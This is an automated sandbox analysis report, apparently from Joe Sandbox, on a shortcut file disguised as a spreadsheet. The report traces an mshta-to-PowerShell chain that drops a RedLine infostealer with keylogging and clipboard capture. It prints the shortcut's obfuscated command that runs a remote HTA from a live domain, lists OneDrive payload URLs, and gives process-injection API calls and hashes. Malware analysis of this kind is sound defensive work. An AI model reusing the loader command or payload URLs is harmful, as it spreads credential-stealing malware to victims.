Source: mshta.exe, 00000009.00000002.1865747161.000001A2C9C00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta
Source: mshta.exe, 00000009.00000002.1864667684.000001A2C42A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta...
Source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta...-
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta1
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta5
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta6288
Source: FT. 40FE CNY .xlsx.lnk	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaAC:
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC1680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaC:
Source: mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaDe
Source: mshta.exe, 00000009.00000002.1863790955.0000019AC1850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaH
Source: mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaLMEMX
Source: mshta.exe, 00000009.00000002.1863884931.0000019AC19B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaPS_BROW
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaU
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta_
Source: mshta.exe, 00000009.00000003.1859449128.000001A2C48C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta
Source: mshta.exe, 00000009.00000002.1863133474.0000019AC170A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaindows
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zyupsq.by.files.1drv.com/
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zyupsq.by.files.1drv.com/y4mZWAAbbWbD2Z_SLbFHXttkWK-AZlqt62tunxr4xpHZuH07d5XHa5kbVXE61GY17Y2
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zyupsq.by.files.1drv.com/y4meSWi_sxRIVEad6REzmio40CREEc5i8wX7nys_a0wT5VjuHcwzIZewYF7haE8C4Cu
Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zyupsq.by.files.1drv.com:443/y4mZWAAbbWbD2Z_SLbFHXttkWK-AZlqt62tunxr4xpHZuH07d5XHa5kbVXE61GY

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49716 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif

Creates a window with clipboard capturing capabilities

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Window created: window name: CLIPBRDWNDCLASS

Potential key logger detected (key state polling based)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41D67A03 GetKeyState,GetKeyState,GetKeyState,		23_2_41D67A03
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41D67A08 GetKeyState,GetKeyState,GetKeyState,		23_2_41D67A08

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_7800.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\Public\Libraries\UcvuiswbO.bat, type: DROPPED	Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen

Found URL in windows shortcut file (LNK)

Source: Initial file

Strings: https://www.sessosesso.it/assets/aw/yt.htaAC:

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\uc.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: FT. 40FE CNY .xlsx.lnk

LNK file: .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta

Contains functionality to call native functions

Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0299C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	19_2_0299C3F8
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0299C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	19_2_0299C368
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0299C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	19_2_0299C4DC
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	19_2_02997AC0
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02997968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	19_2_02997968
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02997F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	19_2_02997F48
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0299C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	19_2_0299C3F6
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02997966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	19_2_02997966
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02997F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	19_2_02997F46
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028BC4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	24_2_028BC4DC
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028B7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	24_2_028B7AC0
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028B7968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	24_2_028B7968
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028B7F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	24_2_028B7F48
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028BC3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	24_2_028BC3F8
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028BC3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	24_2_028BC3F6
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028BC368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	24_2_028BC368
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028B7966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	24_2_028B7966
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028B7F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	24_2_028B7F46

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_0299CA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle,

19_2_0299CA6C

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFAAB970E65	15_2_00007FFAAB970E65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB955F80	17_2_00007FFAAB955F80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB9834B8	17_2_00007FFAAB9834B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95BC90	17_2_00007FFAAB95BC90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95BC35	17_2_00007FFAAB95BC35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95BB3B	17_2_00007FFAAB95BB3B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95E318	17_2_00007FFAAB95E318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95BA99	17_2_00007FFAAB95BA99
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95DFE0	17_2_00007FFAAB95DFE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB96CEA0	17_2_00007FFAAB96CEA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA2362E	17_2_00007FFAABA2362E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA232A0	17_2_00007FFAABA232A0
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029820C4	19_2_029820C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00408C60	23_2_00408C60
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_0040DC11	23_2_0040DC11
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00407C3F	23_2_00407C3F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00418CCC	23_2_00418CCC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00406CA0	23_2_00406CA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_004028B0	23_2_004028B0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_0041A4BE	23_2_0041A4BE
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00418244	23_2_00418244
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00401650	23_2_00401650
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00402F20	23_2_00402F20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_004193C4	23_2_004193C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00418788	23_2_00418788
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00402F89	23_2_00402F89
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_00402B90	23_2_00402B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_004073A0	23_2_004073A0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_3D941030	23_2_3D941030
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_3D941020	23_2_3D941020
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411B99A0	23_2_411B99A0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411B1220	23_2_411B1220
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411B1AF0	23_2_411B1AF0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411BCD30	23_2_411BCD30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411B0ED8	23_2_411B0ED8
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411B3EDF	23_2_411B3EDF
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_411B3EF0	23_2_411B3EF0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41454570	23_2_41454570
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41450040	23_2_41450040
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_414560F0	23_2_414560F0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41453370	23_2_41453370
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_4145F3D1	23_2_4145F3D1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41459B90	23_2_41459B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_4145ABB0	23_2_4145ABB0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_4145D1A8	23_2_4145D1A8
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41453AB7	23_2_41453AB7
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41D65168	23_2_41D65168
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_2_41D60990	23_2_41D60990
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00408C60	23_1_00408C60
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_0040DC11	23_1_0040DC11
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00407C3F	23_1_00407C3F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00418CCC	23_1_00418CCC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00406CA0	23_1_00406CA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_004028B0	23_1_004028B0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_0041A4BE	23_1_0041A4BE
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00418244	23_1_00418244
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00401650	23_1_00401650
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00402F20	23_1_00402F20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_004193C4	23_1_004193C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00418788	23_1_00418788
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00402F89	23_1_00402F89
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_00402B90	23_1_00402B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 23_1_004073A0	23_1_004073A0
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: 24_2_028A20C4	24_2_028A20C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00408C60	25_2_00408C60
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_0040DC11	25_2_0040DC11
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00407C3F	25_2_00407C3F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00418CCC	25_2_00418CCC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00406CA0	25_2_00406CA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_004028B0	25_2_004028B0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_0041A4BE	25_2_0041A4BE
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00418244	25_2_00418244
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00401650	25_2_00401650
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00402F20	25_2_00402F20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_004193C4	25_2_004193C4
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00418788	25_2_00418788
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00402F89	25_2_00402F89
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_00402B90	25_2_00402B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_004073A0	25_2_004073A0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_25B81030	25_2_25B81030
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_25B81020	25_2_25B81020
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29439A58	25_2_29439A58
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29431AF0	25_2_29431AF0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29430ED8	25_2_29430ED8
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29433EEC	25_2_29433EEC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29433EF0	25_2_29433EF0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29431220	25_2_29431220
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296DF3D1	25_2_296DF3D1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296DABB0	25_2_296DABB0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296D9B90	25_2_296D9B90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296D4570	25_2_296D4570
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296D0680	25_2_296D0680
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296DD1A8	25_2_296DD1A8
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_296D3AB7	25_2_296D3AB7
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29CB15FC	25_2_29CB15FC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29CB15F0	25_2_29CB15F0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29FE0990	25_2_29FE0990
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: 25_2_29FE5168	25_2_29FE5168

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\bwsiuvcU.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96

Found potential string decryption / allocating functions

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: String function: 0040D606 appears 72 times
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Code function: String function: 0040E1D8 appears 132 times
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: String function: 028A6658 appears 32 times
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: String function: 028A4698 appears 156 times
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Code function: String function: 028A4824 appears 629 times
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: String function: 029844A0 appears 67 times
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: String function: 02986658 appears 32 times
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: String function: 02984824 appears 883 times
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: String function: 02997BE8 appears 45 times
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: String function: 02984698 appears 247 times

PE file contains more sections than normal

Source: netutils.dll.19.dr

Static PE information: Number of sections : 19 > 10

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Yara signature match

Source: amsi64_7800.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
